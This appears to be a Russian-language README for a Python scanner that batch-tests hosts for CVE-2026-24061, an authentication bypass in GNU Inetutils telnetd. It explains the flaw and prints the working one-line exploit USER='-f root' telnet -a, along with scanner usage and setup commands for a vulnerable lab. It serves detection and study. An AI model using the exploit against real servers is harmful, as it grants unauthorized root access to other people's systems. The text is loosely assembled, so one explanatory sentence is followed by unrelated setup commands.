
Python-сканер, который обнаруживает CVE-2026-24061 в GNU Inetutils telnetd, позволяя проводить пакетное тестирование нескольких целей на уязвимость обхода аутентификации.
⚠️ Внимание:
CVE-2026-24061GNU Inetutils — это набор классических сетевых утилит от проекта GNU, включающий службу telnetd, то есть демон Telnet-сервера. В версиях с 1.9.3 по 2.7 в службе telnetd существует критический дефект в процессе аутентификации пользователей. При вызове системной программы входа /usr/bin/login служба не выполняет эффективную фильтрацию и проверку переменной окружения USER, передаваемой клиентом. Злоумышленник может, задав определённое значение переменной USER, напрямую внедрить параметр -f в команду login. Параметр -f программы login используется для «пропуска повторной аутентификации», что позволяет злоумышленнику полностью обойти все этапы проверки пароля и напрямую установить удалённую сессию под пользователем root, получив тем самым высший уровень контроля над сервером. Эта уязвимость чрезвычайно опасна и фактически представляет собой публичный удалённый root-бэкдор, не требующий никаких учётных данных.
USER='-f root' telnet -a <target_ip>

python3 cve-2026-24061.py -i 10.10.168.128
python3 cve-2026-24061.py -f targets.txt
Указанная выше команда устанавливает переменную окружения USER в значение -f root. Когда уязвимая служба telnetd получает соединение, она формирует и выполняет системный вызов, аналогичный следующему:
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf
sudo systemctl restart openbsd-inetd
sudo ss -tuln | grep ':23'
telnet localhost 23